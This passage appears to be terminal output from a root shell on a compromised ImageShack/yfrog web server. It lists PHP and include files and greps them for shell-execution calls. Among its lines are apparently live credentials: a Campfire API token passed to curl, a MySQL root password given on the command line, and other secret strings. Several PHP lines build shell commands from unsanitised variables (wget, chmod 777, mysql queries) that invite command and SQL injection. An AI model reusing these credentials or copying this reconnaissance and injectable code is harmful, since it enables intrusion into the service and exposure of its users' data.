class.phpmailer.php
-rwxr-xr-x 2 image image 6642 Aug 5 2009 /home/image/www/homepage/m/in
dex.php
-rwxr-xr-x 2 image image 3324 Aug 5 2009 /home/image/www/homepage/m/up
date_cache.php
-rwxr-xr-x 2 image image 24053 Aug 5 2009 /home/image/www/homepage/m/wu
rfl_class.php
-rwxr-xr-x 2 image image 6817 Aug 5 2009 /home/image/www/homepage/m/wu
rfl_config.php
-rwxr-xr-x 2 image image 23870 Aug 5 2009 /home/image/www/homepage/m/wu
rfl_parser.php
-rwxr-xr-x 1 1002 1002 66348 Dec 31 2008 /home/image/www/php/php-5.2.9
/run-tests.php
-rwxr-xr-x 1 1002 1002 51718 Dec 31 2008 /home/image/www/php/php-5.2.9
/server-tests.php
-rwxr-xr-x 1 1002 1002 2105 Sep 19 2005 /home/image/www/php/php-5.2.9
/server-tests-config.php
# ls -alt /home/image/www/*/*.inc*
-rwxr-xr-x 2 image image 2663 Feb 12 2011 /home/image/www/registration/re
gemail.inc
-rwxr-xr-x 2 image image 2217 Feb 12 2011 /home/image/www/registration/re
gemailpass.inc
-rw-r--r-- 1 image image 488 Sep 2 2010 /home/image/www/db_api/stream_c
onfig.inc
-rwxr-xr-x 2 image image 3468 Jul 27 2010 /home/image/www/registration/db
client.inc
-rwxr-xr-x 2 image image 104509 Jul 20 2010 /home/image/www/db_api/customfu
nc.inc
-rwxr-xr-x 2 image image 1410 Jul 15 2010 /home/image/www/mobilevideo/con
fig.inc
-rwxr-xr-x 2 image image 20653 Jul 15 2010 /home/image/www/mobilevideo/fun
ctions.inc
-rwxr-xr-x 2 image image 310 Jun 17 2010 /home/image/www/import/utils.in
c
-rwxr-xr-x 2 image image 1348 Jun 3 2010 /home/image/www/homepage/mailco
mment.inc
-rwxr-xr-x 2 image image 1781 Jun 3 2010 /home/image/www/registration/ch
angeaddremail.inc
-rwxr-xr-x 2 image image 1641 Jun 3 2010 /home/image/www/registration/pa
sswordrecoveryemail.inc
-rwxr-xr-x 2 image image 2000 Jun 3 2010 /home/image/www/slideshow/mailc
omment.inc
-rwxr-xr-x 2 image image 2755 Jun 3 2010 /home/image/www/yfrog/footer.in
c
-rwxr-xr-x 2 image image 20533 Jun 3 2010 /home/image/www/yfrog/utils.inc
-rwxr-xr-x 2 image image 6249 May 26 2010 /home/image/www/homepage/proces
scomment.inc
-rwxr-xr-x 2 image image 8664 May 26 2010 /home/image/www/my_gallery/util
s.inc
-rwxr-xr-x 2 image image 9240 May 26 2010 /home/image/www/slideshow/utils
.inc
-rwxr-xr-x 2 image image 33437 May 19 2010 /home/image/www/db_api/dbapi.in
c
-rwxr-xr-x 2 image image 30643 May 19 2010 /home/image/www/db_api/friends_
customfunc.inc
-rwxr-xr-x 2 image image 356088 May 19 2010 /home/image/www/db_api/publicap
icustomfunc.inc
-rwxr-xr-x 2 image image 12952 May 19 2010 /home/image/www/db_api/slidesho
wcustomfunc.inc
-rwxr-xr-x 2 image image 45690 May 19 2010 /home/image/www/db_api/tagsdb_v
6.inc
-rwxr-xr-x 2 image image 26464 May 19 2010 /home/image/www/db_api/videoapi
_v2.inc
-rwxr-xr-x 2 image image 10485 May 19 2010 /home/image/www/db_api/videoapi
_v3.inc
-rwxr-xr-x 2 image image 46931 May 19 2010 /home/image/www/db_api/videoapi
_v4.inc
-rwxr-xr-x 2 image image 34812 May 19 2010 /home/image/www/db_api/videoapi
customfunc.inc
-rwxr-xr-x 2 image image 8452 May 7 2010 /home/image/www/db_api/linked_l
ist.inc
-rwxr-xr-x 2 image image 6459 Apr 27 2010 /home/image/www/slideshow/confi
g.inc
-rwxr-xr-x 2 image image 5150 Apr 27 2010 /home/image/www/slideshow/conve
rtor.inc
-rwxr-xr-x 2 image image 3239 Apr 16 2010 /home/image/www/yfrog/yfrog_fri
ends.inc
-rwxr-xr-x 2 image image 1637 Apr 15 2010 /home/image/www/reviewer/utils.
inc
-rwxr-xr-x 2 image image 11371 Apr 1 2010 /home/image/www/prefs/dbclient.
inc
-rwxr-xr-x 2 image image 24893 Apr 1 2010 /home/image/www/yfrog/multipost
.inc
-rwxr-xr-x 2 image image 54 Mar 4 2010 /home/image/www/yfrog/premium.i
nc
-rwxr-xr-x 2 image image 1330 Mar 4 2010 /home/image/www/yfrog/config.in
c
-rwxr-xr-x 2 image image 1484 Feb 25 2010 /home/image/www/prefs/dbsession
.inc
-rwxr-xr-x 2 image image 804 Feb 25 2010 /home/image/www/prefs/openidcon
fig.inc
-rwxr-xr-x 2 image image 1588 Feb 23 2010 /home/image/www/yfrog/list_twit
ter.inc
-rwxr-xr-x 2 image image 97 Feb 18 2010 /home/image/www/mobilevideo/com
mon.inc
-rwxr-xr-x 2 image image 2128 Feb 2 2010 /home/image/www/prefs/utils.inc
-rwxr-xr-x 2 image image 497 Jan 22 2010 /home/image/www/db_api/dbconfig
.inc
-rwxr-xr-x 2 image image 1315 Jan 6 2010 /home/image/www/yfrog/memcacher
.inc
-rwxr-xr-x 2 image image 7613 Jan 6 2010 /home/image/www/my_gallery/dbcl
ient-simplerpc.inc
-rwxr-xr-x 2 image image 648 Dec 31 2009 /home/image/www/yfrog/beanstalk
.inc
-rwxr-xr-x 2 image image 268 Dec 16 2009 /home/image/www/yfrog/setfriend
s_job.inc
# ls -alt /home/image/www/*.inc*
-rwxr-xr-x 2 image image 12087 Mar 21 17:38 /home/image/www/backend.inc
-rwxr-xr-x 2 image image 3386 Dec 1 2009 /home/image/www/homepage/utils.
inc
-rw-r--r-- 1 root root 19041 Feb 7 2011 /home/image/www/blacklist.inc
-rwxr-xr-x 2 image image 2091 Nov 16 2009 /home/image/www/slideshow/playe
r.inc
-rwxr-xr-x 2 image image 13782 Sep 21 2010 /home/image/www/config.inc
-rwxr-xr-x 2 image image 6499 Nov 16 2009 /home/image/www/my_gallery/conf
ig.inc
-rwxr-xr-x 2 image image 4337 Aug 10 2010 /home/image/www/pornrx.inc
-rwxr-xr-x 2 image image 1678 Nov 16 2009 /home/image/www/video/config.in
c
-rwxr-xr-x 2 image image 12182 Jul 27 2010 /home/image/www/imagecomments.in
c
-rwxr-xr-x 2 image image 3596 Oct 27 2009 /home/image/www/yfrog/oauthutil
s.inc
-rwxr-xr-x 2 image image 1220 Jun 17 2010 /home/image/www/aff.inc
-rwxr-xr-x 2 image image 41 Oct 14 2009 /home/image/www/sb/config.inc
-rwxr-xr-x 2 image image 29181 Jun 15 2010 /home/image/www/gallery_api.inc
-rwxr-xr-x 2 image image 7218 Sep 16 2009 /home/image/www/slideshow/dbcli
ent-simplerpc.inc
-rwxr-xr-x 2 image image 9507 Jun 3 2010 /home/image/www/comments.inc
-rwxr-xr-x 2 image image 984 Sep 8 2009 /home/image/www/friends/utils.i
nc
-rwxr-xr-x 2 image image 9109 Jun 3 2010 /home/image/www/gallerycomments.
inc
-rwxr-xr-x 2 image image 20798 Sep 8 2009 /home/image/www/homepage/commen
tbuilder.inc
-rwxr-xr-x 2 image image 2810 Jun 3 2010 /home/image/www/mailcomment.inc
-rwxr-xr-x 2 image image 49 Sep 8 2009 /home/image/www/registration/ut
ils.inc
-rwxr-xr-x 2 image image 23215 May 26 2010 /home/image/www/iconvert.inc
-rwxr-xr-x 2 image image 518 Sep 8 2009 /home/image/www/video/utils.inc
-rwxr-xr-x 2 image image 4233 May 12 2010 /home/image/www/twitter_api_call
s.inc
-rwxr-xr-x 2 image image 145 Sep 3 2009 /home/image/www/my_gallery/imag
e.inc
-rwxr-xr-x 2 image image 40428 May 10 2010 /home/image/www/xmldata.inc
-rwxr-xr-x 2 image image 1457 Sep 3 2009 /home/image/www/my_gallery/play
er.inc
-rwxr-xr-x 2 image image 3065 May 8 2010 /home/image/www/prev_next.inc
-rwxr-xr-x 2 image image 6064 Sep 3 2009 /home/image/www/slideshow/dbcli
ent.inc
-rwxr-xr-x 2 image image 915 Apr 28 2010 /home/image/www/xmlinc_dump.inc
-rwxr-xr-x 2 image image 145 Sep 3 2009 /home/image/www/slideshow/image
.inc
-rwxr-xr-x 2 image image 1921 Apr 15 2010 /home/image/www/utils.inc
-rwxr-xr-x 2 image image 3355 Aug 5 2009 /home/image/www/db_api/dbfuncti
ons.inc
-rwxr-xr-x 2 image image 1311 Mar 4 2010 /home/image/www/keys.inc
-rwxr-xr-x 2 image image 523 Aug 5 2009 /home/image/www/db_api/mem_modu
le.inc
-rwxr-xr-x 2 image image 2126 Feb 22 2010 /home/image/www/trackingcookie.i
nc
-rwxr-xr-x 2 image image 2232 Aug 5 2009 /home/image/www/registration/co
nfig.inc
-rwxr-xr-x 2 image image 1528 Feb 9 2010 /home/image/www/favorites.inc
-rwxr-xr-x 2 image image 2301 Aug 5 2009 /home/image/www/toolbar/config.
inc
-rwxr-xr-x 2 image image 5233 Feb 4 2010 /home/image/www/get_prevnext.inc
-rwxr-xr-x 2 image image 2789 Aug 5 2009 /home/image/www/toolbar/dbclien
t.inc
-rwxr-xr-x 2 image image 1715 Jan 20 2010 /home/image/www/load_prefs.inc
-rwxr-xr-x 2 image image 125 Aug 5 2009 /home/image/www/toolbar/misc.in
c
-rwxr-xr-x 2 image image 282 Jan 6 2010 /home/image/www/newimageshack.in
c
-rwxr-xr-x 2 image image 1043 Aug 5 2009 /home/image/www/reviewer/config
.inc
-rwxr-xr-x 2 image image 4917 Dec 31 2009 /home/image/www/get_twitter.inc
-rwxr-xr-x 2 image image 7474 Aug 5 2009 /home/image/www/reviewer/dbclie
nt.inc
-rwxr-xr-x 2 image image 6715 Dec 4 2009 /home/image/www/related.inc
-rwxr-xr-x 2 image image 251 Aug 5 2009 /home/image/www/reviewer/spam.d
b.inc
-rwxr-xr-x 2 image image 1027 Nov 30 2009 /home/image/www/meta.inc
-rwxr-xr-x 2 image image 1190 Aug 5 2009 /home/image/www/reviewer/users.
db.inc
-rwxr-xr-x 2 image image 7928 Sep 30 2009 /home/image/www/dbclient.inc
-rwxr-xr-x 2 image image 5108 Aug 5 2009 /home/image/www/homepage/config
.inc
-rwxr-xr-x 2 image image 7695 Sep 15 2009 /home/image/www/upload_api_galle
ry.inc
-rwxr-xr-x 2 image image 21597 Aug 5 2009 /home/image/www/homepage/dbclie
nt.inc
-rwxr-xr-x 2 image image 560 Sep 10 2009 /home/image/www/searchapi.inc
-rwxr-xr-x 2 image image 2375 Aug 5 2009 /home/image/www/homepage/friend
s.inc
-rwxr-xr-x 2 image image 1892 Aug 5 2009 /home/image/www/ad_urls.inc
-rwxr-xr-x 2 image image 824 Aug 5 2009 /home/image/www/yfrog/analytics
.inc
-rwxr-xr-x 2 image image 2237 Aug 5 2009 /home/image/www/ads_selector.inc
-rwxr-xr-x 2 image image 2047 Aug 5 2009 /home/image/www/yfrog/lang.inc
-rwxr-xr-x 2 image image 17755 Aug 5 2009 /home/image/www/atom.inc
-rwxr-xr-x 2 image image 1543 Aug 5 2009 /home/image/www/friends/config.
inc
-rwxr-xr-x 2 image image 698 Aug 5 2009 /home/image/www/createimage.inc
-rwxr-xr-x 2 image image 2642 Aug 5 2009 /home/image/www/friends/dbclien
t.inc
-rwxr-xr-x 2 image image 814 Aug 5 2009 /home/image/www/devkey.inc
-rwxr-xr-x 2 image image 1117 Aug 5 2009 /home/image/www/friends/mail_fr
iend_added.inc
-rwxr-xr-x 2 image image 2217 Aug 5 2009 /home/image/www/gallery_util.inc
-rwxr-xr-x 2 image image 1129 Aug 5 2009 /home/image/www/friends/mail_fr
iend_removed.inc
-rwxr-xr-x 2 image image 292 Aug 5 2009 /home/image/www/loginheaders.inc
-rwxr-xr-x 2 image image 666 Aug 5 2009 /home/image/www/my_gallery/colo
rs.inc
-rwxr-xr-x 2 image image 638 Aug 5 2009 /home/image/www/session_fp.inc
-rwxr-xr-x 2 image image 2320 Aug 5 2009 /home/image/www/my_gallery/mark
up.inc
-rwxr-xr-x 2 image image 18645 Aug 5 2009 /home/image/www/my_gallery/slid
eshow.inc
-rwxr-xr-x 2 image image 4008 Aug 5 2009 /home/image/www/prefs/config.in
c
-rwxr-xr-x 2 image image 649 Aug 5 2009 /home/image/www/flashupload/con
fig.inc
-rwxr-xr-x 2 image image 588 Aug 5 2009 /home/image/www/flashupload/tmp
redir.inc
-rwxr-xr-x 2 image image 1472 Aug 5 2009 /home/image/www/imgcache/apache
_cache.inc
-rwxr-xr-x 2 image image 57 Aug 5 2009 /home/image/www/imgcache/config
.inc
-rwxr-xr-x 2 image image 744 Aug 5 2009 /home/image/www/import/config.i
nc
-rwxr-xr-x 2 image image 1770 Aug 5 2009 /home/image/www/picasa/rssparse
r.inc
-rwxr-xr-x 2 image image 13145 Aug 5 2009 /home/image/www/slideshow/ads.i
nc
-rwxr-xr-x 2 image image 666 Aug 5 2009 /home/image/www/slideshow/color
s.inc
-rwxr-xr-x 2 image image 4200 Aug 5 2009 /home/image/www/slideshow/comme
nts.inc
-rwxr-xr-x 2 image image 2320 Aug 5 2009 /home/image/www/slideshow/marku
p.inc
-rwxr-xr-x 2 image image 18645 Aug 5 2009 /home/image/www/slideshow/slide
show.inc
-rwxr-xr-x 2 image image 3085 Aug 5 2009 /home/image/www/slideshow/smili
nfo.inc
-rwxr-xr-x 2 image image 4649 Aug 5 2009 /home/image/www/video/dbclient.
inc
# cat /home/image/www/chmod_cli.php
<?php
$string = file_get_contents($argv[1]);
echo $string;
include("functions.php");
chmod_list($string,"kotik123");
?>
# grep 'passthru' /home/image/www/*.php
/home/image/www/403.php: fpassthru($file);
/home/image/www/displayimage.php:fpassthru($thumb);
/home/image/www/dynamic-ad1.php:fpassthru($fp);
/home/image/www/dynamic-ad1.php:fpassthru($fp);
# grep '`' /home/image/www/*.php | wc
155 1555 16718
# grep '`' /home/image/www/*.php
/home/image/www/bigfoot.php:# $serv = trim(`/sbin/ifconfig | grep "Bcast" |
head -1 | cut -d":" -f2 | cut -d" " -f1`);
/home/image/www/bigfoot.php: $serv = trim(`/sbin/ifconfig | grep "Bca
st" | head -1 | cut -d":" -f2 | cut -d" " -f1`);
/home/image/www/bigfoot.php: $serv = trim(`/sbin/ifconfig | grep "Bca
st" | head -1 | cut -d":" -f2 | cut -d" " -f1`);
/home/image/www/chmod_me3.php://`/usr/local/bin/php /usr/local/bin/file_dele
tion.php $tempfile > /dev/null 2>&1 &`;
/home/image/www/chmod_pull.php:$list = trim(`cat /home/image/www/chmod_dir/c
hmod.img$id | sort | uniq`);
/home/image/www/chmod_pull.php: `cat /home/image/www/chmod_dir/chmod.img$id
>> /home/image/www/chmod_dir/chmod_me.backup`;
/home/image/www/chmod_pull.php: `echo "" > /home/image/www/chmod_dir/chmod.i
mg$id`;
/home/image/www/convo.php: `/usr/bin/curl -u be651a30591d2cf1428683182136173
ad1ffcd23:X https://imageshack.campfirenow.com/room/$room/recent.xml 2>/dev/
null | grep datetime | cut -d">" -f2 | cut -d"<" -f1 > /home/image/www/$room
.txt`;
/home/image/www/convo.php:`cp /home/image/www/convo.txt /home/image/www/conv
o.old`;
/home/image/www/csvtohtml.php:$last = explode(",",trim(`tail -1 $rowfile[$cs
v]`)); //get a comma separated list of data from the last row in the report
/home/image/www/csvtohtml.php:$newheader = str_replace(" ",",",trim(`cat $he
ader[$csv] | awk -F"," '{print $1','$awk}'`));
/home/image/www/csvtohtml.php:$rows = explode("\n",str_replace(" ",",",trim(
`tac $rowfile[$csv] | awk -F"," '{print $1','$awk}'`)));
/home/image/www/delete.php:`/bin/chmod 000 $path`;
/home/image/www/delete.php:`/bin/chmod 000 $thumbpath`;
/home/image/www/delete.php:`/bin/chmod 000 $atompath`;
/home/image/www/delete.php: //`/bin/chmod 000 $path`;
/home/image/www/delete.php: //`/bin/chmod 000 $thumbpath`;
/home/image/www/delete_video.php:`/bin/chmod 000 $path`;
/home/image/www/delete_video.php:`/bin/chmod 000 $thumbpath`;
/home/image/www/delete_video.php:`/bin/chmod 000 $atompath`;
/home/image/www/delete_video.php: //`/bin/chmod 000 $path`;
/home/image/www/delete_video.php: //`/bin/chmod 000 $thumbpath`;
/home/image/www/deletefailed.php: $total_failed = trim(`cat /home/image/www
/chmod_dir/purge_list_fails | wc -l`);
/home/image/www/functions.php:$digData = `dig imageshack.us | grep imageshac
k.us | grep -v ns | grep -v '\;' | cut -d"A" -f2 | awk '{ print $1 }'`;
/home/image/www/functions.php:$digData .= `dig www.imageshack.us | grep imag
eshack.us | grep -v ns | grep -v '\;' | cut -d"A" -f2 | awk '{ print $1 }'`;
/home/image/www/grand.php: $file = `tail -1008 /tmp/values | tac`; //6*24*7
= one week
/home/image/www/grand.php: $head_file = `head -1 /tmp/values`;
/home/image/www/grand2.php: $file = `tail -500 /tmp/values | tac`;
/home/image/www/grand2.php: $head_file = `head -1 /tmp/values`;
/home/image/www/guestembed.php: $ret=`curl -d "$data" http://$gal_elems[0].i
mageshack.us/send_note.php`;
/home/image/www/mod_report.php: $data = explode("\n",trim(`for i in \`/bin/l
s /disk2/reports/$service/$date\`; do echo -n \$i" "; /usr/bin/stat --format
=%Y /disk2/reports/$service/$date/\$i; done | sed 's/\./ /g'`));
/home/image/www/modpanel.php: $data[$service] = trim(
`/bin/find $path[$service]/$day[$service]/. -cmin +1 -amin +5 -type f ! -siz
e 0 | awk -F"/" '{print \$NF}' | grep file | sort -r`);
/home/image/www/modpanel.php: `/bin/touch $final`;
/home/image/www/modpanel.php: `mkdir -p $mkdir`;
/home/image/www/modpanel.php: `chmod 777 $mkd
ir`;
/home/image/www/modpanel.php: `wget -O $wget $url`;
/home/image/www/modpanel.php: `touch $wget`;
/home/image/www/modpanel.php: `mkdir -p $mkdi
r`;
/home/image/www/modpanel.php: `chmod -R 777 $mkdir`;
/home/image/www/modpanel.php: `wget -O $wget
$url`;
/home/image/www/modpanel.php: `touch $wget`;
/home/image/www/modpanel.php: $illegal_line = trim(`cat $fullpath/$s_serv
ice/$sday/$stime.file | grep $grep`)."\n";
/home/image/www/modpanel.php: `cat $fullpath/$s_service/$sday/$stime.file >>
/disk2/reports/$s_service/$sday/$stime.$local_auth[username]`;
/home/image/www/modpanel.php: `cat $fullpath/$s_service/$sday/$stime.$local_
auth[username] >> /disk2/reports/hbase_insert/moderated`;
/home/image/www/modpanel.php: `rm -f $fullpath/$s_service/$sday/$stime.file`
;
/home/image/www/modpanel.php: $pending = trim(`/bin/ls $directory | grep fil
e | wc -l`);
/home/image/www/modpanel.php: $reviewed = trim(`/bin/ls $directory | grep $l
ocal_auth[username] | wc -l`);
/home/image/www/modpanel.php: $last_min = trim(`/bin/ls $fullpath/mobile/$da
y | tail -30 | grep file | wc -l`) + trim(`/bin/ls $fullpath/yfrog/$day | ta
il -30 | grep file | wc -l`) + trim(`/bin/ls $fullpath/imageshack/$day | ta
il -30 | grep file | wc -l`);
/home/image/www/modpanel.php: $file_list = trim(`/bin/ls -t /home/image/www/
$location | xargs`);
/home/image/www/modpanel1.php: $data[$service] = trim(`/bin/find $path[$se
rvice]/$day[$service]/. -cmin +1 -amin +15 -type f ! -size 0 | awk -F"/" '{p
rint \$NF}' | grep file | sort -r`);
/home/image/www/modpanel1.php: `/bin/touch $final`;
/home/image/www/modpanel1.php: `mkdir -p $mkdir`;
/home/image/www/modpanel1.php: `chmod 777 $mk
dir`;
/home/image/www/modpanel1.php: `wget -O $wget $url`;
/home/image/www/modpanel1.php: `touch $wget`;
/home/image/www/modpanel1.php: `mkdir -p $mkd
ir`;
/home/image/www/modpanel1.php: `chmod -R 777 $mkdir`;
/home/image/www/modpanel1.php: `wget -O $wget
$url`;
/home/image/www/modpanel1.php: `touch $wget`;
/home/image/www/modpanel1.php: $illegal_line = trim(`cat $fullpath/$s_ser
vice/$sday/$stime.file | grep $grep`)."\n";
/home/image/www/modpanel1.php: `cat $fullpath/$s_service/$sday/$stime.file >
> /disk2/reports/$s_service/$sday/$stime.$local_auth[username]`;
/home/image/www/modpanel1.php: `rm -f $fullpath/$s_service/$sday/$stime.file
`;
/home/image/www/modpanel1.php: $pending = trim(`/bin/ls $directory | grep fi
le | wc -l`);
/home/image/www/modpanel1.php: $reviewed = trim(`/bin/ls $directory | grep $
local_auth[username] | wc -l`);
/home/image/www/modpanel1.php: //$last_min = trim(`/bin/ls $fullpath/imagesh
ack/$day | tail -30 | grep file | wc -l`) + trim(`/bin/ls $fullpath/yfrog/$d
ay | tail -30 | grep file | wc -l`);
/home/image/www/modpanel1.php: $last_min = trim(`/bin/ls $fullpath/mobile/$d
ay | tail -30 | grep file | wc -l`) + trim(`/bin/ls $fullpath/yfrog/$day | t
ail -30 | grep file | wc -l`) + trim(`/bin/ls $fullpath/imageshack/$day | t
ail -30 | grep file | wc -l`);
/home/image/www/modpanel1.php: $file_list = trim(`/bin/ls -t /home/image/www
/$location | xargs`);
/home/image/www/modpanel2.php: $data[$service] = trim(`/bin/find $path[$se
rvice]/$day[$service]/. -cmin +1 -amin +15 -type f ! -size 0 | awk -F"/" '{p
rint \$NF}' | grep file | sort -r`);
/home/image/www/modpanel2.php: `/bin/touch $final`;
/home/image/www/modpanel2.php: `mkdir -p $mkdir`;
/home/image/www/modpanel2.php: `chmod 777 $mk
dir`;
/home/image/www/modpanel2.php: `wget -O $wget $url`;
/home/image/www/modpanel2.php: `touch $wget`;
/home/image/www/modpanel2.php: `mkdir -p $mkd
ir`;
/home/image/www/modpanel2.php: `chmod -R 777 $mkdir`;
/home/image/www/modpanel2.php: `wget -O $wget
$url`;
/home/image/www/modpanel2.php: `touch $wget`;
/home/image/www/modpanel2.php: $illegal_line = trim(`cat $fullpath/$s_ser
vice/$sday/$stime.file | grep $grep`)."\n";
/home/image/www/modpanel2.php: `cat $fullpath/$s_service/$sday/$stime.file >
> /disk2/reports/$s_service/$sday/$stime.$local_auth[username]`;
/home/image/www/modpanel2.php: `cat $fullpath/$s_service/$sday/$stime.file >
> /disk2/reports/hbase_insert/moderated`;
/home/image/www/modpanel2.php: `rm -f $fullpath/$s_service/$sday/$stime.file
`;
/home/image/www/modpanel2.php: $pending = trim(`/bin/ls $directory | grep fi
le | wc -l`);
/home/image/www/modpanel2.php: $reviewed = trim(`/bin/ls $directory | grep $
local_auth[username] | wc -l`);
/home/image/www/modpanel2.php: //$last_min = trim(`/bin/ls $fullpath/imagesh
ack/$day | tail -30 | grep file | wc -l`) + trim(`/bin/ls $fullpath/yfrog/$d
ay | tail -30 | grep file | wc -l`);
/home/image/www/modpanel2.php: $last_min = trim(`/bin/ls $fullpath/mobile/$d
ay | tail -30 | grep file | wc -l`) + trim(`/bin/ls $fullpath/yfrog/$day | t
ail -30 | grep file | wc -l`) + trim(`/bin/ls $fullpath/imageshack/$day | t
ail -30 | grep file | wc -l`);
/home/image/www/modpanel2.php: $file_list = trim(`/bin/ls -t /home/image/www
/$location | xargs`);
/home/image/www/modpanel_v2.php: $data[$service] = tr
im(`/bin/find $path[$service]/$day[$service]/. -cmin +1 -amin +3 -type f ! -
size 0 | awk -F"/" '{print \$NF}' | grep file | sort -r`);
/home/image/www/modpanel_v2.php: //$data[$service] = trim(`/bin/find $path
[$service]/$day[$service]/. -cmin +1 -amin +5 -type f ! -size 0 | awk -F"/"
'{print \$NF}' | grep file | sort -r`);
/home/image/www/modpanel_v2.php: //$data[$service] = trim(`/bin/find $path
[$service]/$day[$service]/. -cmin +2 -type f ! -size 0 | awk -F"/" '{print \
$NF}' | grep file | sort -r`);
/home/image/www/modpanel_v2.php: `/bin/touch $final`;
/home/image/www/modpanel_v2.php: `mkdir -p $mkdir`;
/home/image/www/modpanel_v2.php: `chmod 777 $
mkdir`;
/home/image/www/modpanel_v2.php: `wget -O $wget $url`;
/home/image/www/modpanel_v2.php: `touch $wget`;
/home/image/www/modpanel_v2.php: `mkdir -p $m
kdir`;
/home/image/www/modpanel_v2.php: `chmod -R 777 $mkdir`;
/home/image/www/modpanel_v2.php: `wget -O $wg
et $url`;
/home/image/www/modpanel_v2.php: `touch $wget`;
/home/image/www/modpanel_v2.php: $illegal_line = trim(`cat $fullpath/$s_s
ervice/$sday/$stime.file | grep $grep`)."\n";
/home/image/www/modpanel_v2.php: `cat $fullpath/$s_service/$sday/$stime.file
>> /disk2/reports/$s_service/$sday/$stime.$local_auth[username]`;
/home/image/www/modpanel_v2.php: `cat $fullpath/$s_service/$sday/$stime.$loc
al_auth[username] >> /disk2/reports/hbase_insert/moderated`;
/home/image/www/modpanel_v2.php: `rm -f $fullpath/$s_service/$sday/$stime.fi
le`;
/home/image/www/modpanel_v2.php: $pending = trim(`/bin/ls $directory | grep
file | wc -l`);
/home/image/www/modpanel_v2.php: $reviewed = trim(`/bin/ls $directory | grep
$local_auth[username] | wc -l`);
/home/image/www/modpanel_v2.php: //$last_min = trim(`/bin/ls $fullpath/image
shack/$day | tail -30 | grep file | wc -l`) + trim(`/bin/ls $fullpath/yfrog/
$day | tail -30 | grep file | wc -l`);
/home/image/www/modpanel_v2.php: $last_min = trim(`/bin/ls $fullpath/mobile/
$day | tail -30 | grep file | wc -l`) + trim(`/bin/ls $fullpath/yfrog/$day |
tail -30 | grep file | wc -l`) + trim(`/bin/ls $fullpath/imageshack/$day |
tail -30 | grep file | wc -l`);
/home/image/www/modpanel_v2.php: $file_list = trim(`/bin/ls -t /home/image/w
ww/$location | xargs`);
/home/image/www/modpanel_v3.php: $data[$service] = tr
im(`/bin/find $path[$service]/$day[$service]/. -cmin +1 -amin +5 -type f ! -
size 0 | awk -F"/" '{print \$NF}' | grep file | sort -r`);
/home/image/www/modpanel_v3.php: //$data[$service] =
trim(`/bin/find $path[$service]/$day[$service]/. -cmin +1 -amin +5 -type f !
-size 0 | awk -F"/" '{print \$NF}' | grep file | sort -r`);
/home/image/www/modpanel_v3.php: //$data[$service] =
trim(`/bin/find $path[$service]/$day[$service]/. -cmin +2 -type f ! -size 0
| awk -F"/" '{print \$NF}' | grep file | sort -r`);
/home/image/www/modpanel_v3.php: `/bin/touch $final`;
/home/image/www/modpanel_v3.php: `mkdir -p $mkdir`;
/home/image/www/modpanel_v3.php: `chmod 777 $
mkdir`;
/home/image/www/modpanel_v3.php: `wget -O $wget $url`;
/home/image/www/modpanel_v3.php: `touch $wget`;
/home/image/www/modpanel_v3.php: `mkdir -p $m
kdir`;
/home/image/www/modpanel_v3.php: `chmod -R 777 $mkdir`;
/home/image/www/modpanel_v3.php: `wget -O $wg
et $url`;
/home/image/www/modpanel_v3.php: `touch $wget`;
/home/image/www/modpanel_v3.php: $illegal_line = trim(`cat $fullpath/$s_s
ervice/$sday/$stime.file | grep $grep`)."\n";
/home/image/www/modpanel_v3.php: `cat $fullpath/$s_service/$sday/$stime.file
>> /disk2/reports/$s_service/$sday/$stime.$local_auth[username]`;
/home/image/www/modpanel_v3.php: `cat $fullpath/$s_service/$sday/$stime.$loc
al_auth[username] >> /disk2/reports/hbase_insert/moderated`;
/home/image/www/modpanel_v3.php: `rm -f $fullpath/$s_service/$sday/$stime.fi
le`;
/home/image/www/modpanel_v3.php: $pending = trim(`/bin/ls $directory | grep
file | wc -l`);
/home/image/www/modpanel_v3.php: $reviewed = trim(`/bin/ls $directory | grep
$local_auth[username] | wc -l`);
/home/image/www/modpanel_v3.php: //$last_min = trim(`/bin/ls $fullpath/image
shack/$day | tail -30 | grep file | wc -l`) + trim(`/bin/ls $fullpath/yfrog/
$day | tail -30 | grep file | wc -l`);
/home/image/www/modpanel_v3.php: $last_min = trim(`/bin/ls $fullpath/mobile/
$day | tail -30 | grep file | wc -l`) + trim(`/bin/ls $fullpath/yfrog/$day |
tail -30 | grep file | wc -l`) + trim(`/bin/ls $fullpath/imageshack/$day |
tail -30 | grep file | wc -l`);
/home/image/www/modpanel_v3.php: $file_list = trim(`/bin/ls -t /home/image/w
ww/$location | xargs`);
/home/image/www/paypal.php:$dd = `date +%s`;
/home/image/www/pop.php:$list = explode("\n",trim(`for i in \`tail -100 /hom
e/image/www/popular.txt\`; do date -d @\$i '+%m-%d-%y/%R' | sed 's/:/-/g'; d
one | sort | uniq -c | sort -n | tac | awk '{print \$2}'`));
/home/image/www/popcheck.php:$list = explode("\n",trim(`for i in \`cat /home
/image/www/popular.txt\`; do date -d @\$i '+%m-%d-%y/%R' | sed 's/:/-/g'; do
ne | sort -n | uniq`));
/home/image/www/reviewed.php:$info = `mysql -u root -pmutaborius uploads -e
'select reviewed from uploaded_files where server_id = $i and file_name = "$
n" and file_ext = "$e"' | grep -v review`;
/home/image/www/test_reviewed.php:$info = `mysql -u root -pmutaborius upload
s -e 'select reviewed from uploaded_files where server_id = $i and file_name
= "$n" and file_ext = "$e"' | grep -v review`;
/home/image/www/unpop.php:$list = explode("\n",trim(`for i in \`cat /home/im
age/www/popular.txt\`; do date -d @\$i '+%m-%d-%y/%R' | sed 's/:/-/g'; done
| sort | uniq -c | sort -n | tac | awk '{print \$2}'`));
/home/image/www/unserial.php:`tail -300 /var/log/httpd/php_error.log | grep
SERIAL | tail -1 | awk -F"SERIAL: " '{print \$2}' > /tmp/serial`;
/home/image/www/uploads.php: $amount = trim(`cat /disk2/reports/$service/$no
w_date/$now_time* | wc -l`);
/home/image/www/uploads.php:$alert_data = triM(`for i in \`seq 3 5\`; do tai
l -2 /tmp/values | cut -d" " -f\$i | xargs | awk '{print (\$2-\$1)/\$2*100}'
; done | cut -d'.' -f1 | xargs | sed 's/-//g'`);
/home/image/www/write_import2.php: `mkdir -p /disk2/reports/$service/$day`;
/home/image/www/write_import2.php: `chmod -R 777 /disk2/reports/$service/$da
y`;
/home/image/www/write_import2.php:`/bin/touch -r /bin/true $file`;
/home/image/www/write_imports.php: `mkdir -p /disk2/reports/$service/$day`;
/home/image/www/write_imports.php: `chmod -R 777 /disk2/reports/$service/$da
y`;
/home/image/www/write_imports.php:`/bin/touch -r /bin/true $file`;
